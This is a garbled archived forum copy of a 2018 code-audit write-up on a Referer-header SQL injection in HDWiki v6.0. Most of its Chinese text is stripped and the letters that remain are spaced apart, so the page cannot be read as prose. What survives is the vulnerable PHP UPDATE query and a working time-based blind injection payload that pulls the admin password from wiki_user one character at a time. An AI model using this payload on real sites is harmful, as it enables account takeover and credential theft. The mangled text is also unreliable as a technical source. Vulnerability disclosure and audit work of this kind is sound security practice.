[12671] 2018-05-06_代码审计HDWikiv6.0最新版referer注入漏洞

文档创建者:s7ckTeam
浏览次数:6
最后更新:2025-01-18
2018-05-06_代码审计HDWikiv6.0最新版referer注入漏洞   |   H D W i k i   v 6 . 0 r e f e r e r   d a v i c h i 8 2 8 2   F r e e B u f   2 0 1 8 - 0 5 - 0 6 0 × 0 0 H D W i k i   6 . 0 c m s r e f e r e r s q l S Q L O W A S P   T O P   1 0 S Q L T O P   1 S Q L S Q L G E T , P O S T s q l m a p S Q L S Q L c o o k i e U s e r - A g e n t r e f e r e r X - F o r w a r d e d - F o r 0 × 0 1   H D w i k i   v 6 . 0   h d w i k i c o n t r o l u s e r . p h p s q l h t t p : / / k a i y u a n . h o o d o n g . c o m / d o w n l o a d / p h p 5 . 4 g p c s e a y c o n t r o l / u s e r . p h p
d o l o g i n ( ) a d d _ r e f e r e r ( ) m o d e l / u s e r . c l a s s . p h p $ _ S E R V E R [ H T T P _ R E F E R E R ] r e f e r e r h a d d s l a s h e s l i b / s t r i n g . c l a s s . p h p g p c 使 a d d s l a s h e s ( ) g p c p h p g p c g p c _ P O S T , $ _ C O O K I E r e f e r e r g p c p h p 5 . 4 p h p 5 . 4 p h p g p c , r e f e r e r 0 × 0 2   S Q L 使 使 b u r p s u i t e h t t p : / / 1 2 7 . 0 . 0 . 1 / H D W i k i - v 6 . 0 U T F 8 - 2 0 1 7 0 2 0 9 ( 2 ) / h d w i k i / i n d e x . p h p ? u s e r - l o g i n
r e f e r e r r e f e r e r p a y l o a d U P D A T E 使 W H E R E 使 a n d 使 w h e r e p a y l o a d 使 p a y l o a d 便 e 0 x 0 3 P O C p y t h o n p o c $ t h i s - > d b - > q u e r y ( " U P D A T E   " . D B _ T A B L E P R E . " s e s s i o n   S E T   r e f e r e r   = ' " . s t r i n g : : h a d d s l a s h e s ( $ _ S E R V E R [ ' H T T P _ R E F E R E R ' ] ) . " '   W H E R E   s i d = ' " . b a s e : : h g e t c o o k i e ( ' s i d ' ) . " ' " ) ; r e f e r e r : '   w h e r e   i f ( ( s u b s t r ( ( s e l e c t   p a s s w o r d   f r o m   w i k i _ u s e r   w h e r e   u s e r n a m e = ' a d m i n ' ) , 1 , 1 ) ) = ' e ' , s l e e p ( 3 ) , 0 ) #
a d m i n * d a v i c h i 8 2 8 2 F r e e B u f

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则